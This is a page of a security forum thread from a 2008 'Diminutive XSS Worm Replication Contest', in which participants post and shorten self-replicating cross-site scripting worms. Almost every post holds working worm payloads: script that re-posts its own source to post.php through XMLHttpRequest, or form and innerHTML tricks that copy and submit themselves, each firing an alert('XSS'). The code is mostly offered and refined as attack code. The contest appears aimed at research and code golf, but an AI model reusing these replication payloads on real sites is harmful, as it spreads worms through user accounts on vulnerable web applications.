Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 6 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 12:54PM

@sirdarckcat: I'm not sure what you mean by missing the payload. It's on this line, populated mostly by the valueOf method:

x.send("content=<script>" + p.valueOf() + "p()<\/script>");

And what do you mean by server header dependent?

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:03PM

dev80
read the last rule of the contest..
8) must have a payload of "XSS" in an alert box

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 01:08PM

OOOH!, duh, sorry about that. 159 bytes

<script>function p() {
alert("xss");
x=new XMLHttpRequest;
x.open("post","post.php");
x.send("content=<script>" + p.valueOf() + "p()<\/script>");
}p()</script>

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 01:11PM

Just not to post the obvious,
<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">

161!
<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>

156!


And OK, the obvious:
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>


Goodbye (I MUST work!) :(

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/05/2008 01:19PM by ma1.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:20PM

<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>

155 yay

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:31PM

Capitalized for IE:
<form><INPUT name="content"><SCRIPT>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),149))</SCRIPT>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:42PM

Ah wait, mine doesn't work :(

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: amado
Date: January 05, 2008 02:26PM

<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>

140!! :D

http://triviasecurity.net/ ;For all your security needs

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 02:33PM

Quote
dev80
function p(){alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content="+p.valueOf()+"p()<\/script>");}p()
I guess you read my post and stripped + bloated some stuff .. I thought you had something new with the valueOf, instead of toString, but it works the same. On FF you still have the bloat problem (see post), and the \/ gets evaluated to / on FF, so your worm fails on the second runtime. Next to that, you're not encoding it right ...

Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 02:42PM

@bwb labs, still trying to figure out what you meant by the first part of your statement, but I think amado might have cut it down... also...

What do you mean by not encoding it right? For most web applications, that part is optional, as they'll deal with incoming content whether or not it's properly URL encoded.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 02:45PM

I just tested this..

without content-type the XHR is useless, sorry

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 02:49PM

do you mean data won't be sent or parsed by post.php or something else?

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 02:50PM

Won't be parsed by Apache.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:03PM

Quote
dev80
still trying to figure out what you meant by the first part of your statement
just ''+p is equal to p.toString() or p.valueOf().
Quote
dev80
what do you mean by not encoding it right?
content=function p(){alert("xss");x=new... I guess x will be defined instead of all data to content. If the app will just handle all data (in stdin or whatever), content= wouldn't be needed either.
Quote
dev80
do you mean data won't be sent or parsed
I was only testing the sending, that is done (without header).

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:11PM

Quote
amado
<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>
You've solved one of the crappy problems, great! (namely "cannot reference to f in f: f=function(){reference to f}();")
So that strips 2 bytes of my solution :-).

To summarize:
old failing: <script>w=function(){alert(w)}()</script>
amado trick: <script>(function w(){alert(w);}())</script>
old sol:<script>w=function(){send('w='+w+';w()')};w()</script>
new sol:<script>(function w(){send('('+w+'())')}())</script>
Saving two bytes!!!

I'm sticking to the fact that you still have to do it my way (encoding wise) and still have the FF bloat problems:
<script>(function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>("+f+"())</sc"+"ript>"));}())</script>
166 bytes

Crap:
- dubious function.toString() :-)
- bloat (space/tab/newline) in source!!! (and ' gets converted to ", and an extra ; is added)
- still: encodeURIComponent() only method that seems to do the job right (escape & encodeURI won't)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 03:17PM

Quote
ma1
And OK, the obvious:
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

Goodbye (I MUST work!) :(

I surrender to my master, I can't think of any way of making this code shorter..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/05/2008 03:18PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: amado
Date: January 05, 2008 03:23PM

bwb labs, you don't need that last semicolon at the end of the function after send(..), that'll save you one byte ;)

But like sirdarckcat mentioned, it won't work in Apache.

Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 03:35PM

@ma1

That last one can be three bytes shorter.

From:

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

To:

<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

At least, I THINK that'll still work...works in Firefox, no IE handy to test.

*Edited to change "147" to "146" in the modified one.



Edited 1 time(s). Last edit at 01/05/2008 03:37PM by shawn.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:38PM

Quote
amado
you don't need that last semicolon at the end of the function after send(..), that'll save you one byte ;)
But like sirdarckcat mentioned, it won't work in Apache.
I know, the last semicolon is added by the FF toString, so that's why I left it there.
About the "Content-Type: application/www-form-urlencoded" problem, I've just tested on IIS6/ASP.NET, it is required there too.
Quote
rsnake
7) must work in at least Internet Explorer 7.0 and Firefox 2.x
rsnake didn't give server architecture specs, we can assume PHP as the parsing language, but still it is the webserver software that does the CGI form value parsing (I think); there might be an exotic webserver that'll work without the Content-Type (or I can build it myself ;-).

Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 03:45PM

@shawn: But this is against the rules. The stripped quotes will be inserted again.

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 1 time(s). Last edit at 01/05/2008 03:46PM by Alex.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 03:46PM

Quote
shawn
<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>
That doesn't work on replication.

Quote
bwb labs
(or I can build it myself ;-)
hahaha your code will work fine on my webserver.. (I made one.. Azteca WebServer), I'll give you that.. but rsnake still has to decide that.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 03:48PM

<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>

122

The 2nd version becomes:
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137



Edited 2 time(s). Last edit at 01/05/2008 03:50PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 03:52PM

Just in case XHR without content-type is valid, they can still be reduced:
<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>
141
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>
164

Quote
Spyware
<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>

122

The 2nd version becomes:
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137

-Spyware
Check the rules, it shouldn't grow.. you have to do something like..
ÿ<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/ÿ.*/);alert('xss');submit()"></form>
but I don't know if that's valid or if it'll work.. you need a linebreak at the end.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 4 time(s). Last edit at 01/05/2008 04:03PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:58PM

To all you who slice/substr: if the content field is truncated, it doesn't matter if a </form> tag will be added to the field, since the truncation will remove it then. If it will be completely rejected if it gets too long, a slice/substr will be needed of course (since it'll be shorter than duplicating a closing form tag). It all depends on rsnake to clarify some rules here again :-).

To all <form id=whatever> posters, I get "Error: whatever is not defined" in FF2, should the HTML page comply with some quirksmode/doctype thing?

Quote
sirdarckcat
hahaha your code will work fine on my webserver.. (I made one.. Azteca WebServer), I'll give you that.. but rsnake still has to decide that.
Cool :-), yeah, we do need a clarification for it...

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:02PM

bwb labs:
well, the reason I have 2 first/second places on the list is because it depends on rsnake if it's valid or not, if it's not, then the not-bold scores will apply.

and in the slice/substr:

this is longer:
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php', content.value='<form id=z>'+innerHTML+'</form>'))</SCRIPT></form>

than this:
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php', content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

or what do you mean?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:03PM

@Sirdarckcat

The growth was caused by Firefox adding stuff to make it a little bit compliant. If it cannot grow, I'll submit the second version.

<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137, doesn't grow ;)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:04PM

@Spyware it still grows:
<body>
blahblahblah
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

will submit:

blahblahblah
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

maybe something like this:
<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 04:07PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:06PM

Oh man, I need some sleep. Of course it grows, thanks for pointing that out, again. Let me work on it some more.

Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 04:10PM

Alex Wrote:
-------------------------------------------------------
> @shawn: But this is against the rules. The
> stripped quotes will be inserted again.

Gah...never mind that one, then. Managed to make it longer without realizing it.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 04:13PM

Quote
sirdarckcat
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>
You're right! That saves another 2 bytes, but the FF bloat problem stays, so this is still the shortest XMLHttpRequest worm (without Content-Type) till now:
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
Another note about webserver software and Content-Type, there are some big sites that are running their own webserver software/proxies/strange loadbalancers, so I think the likelihood that the Content-Type is not required there is higher.
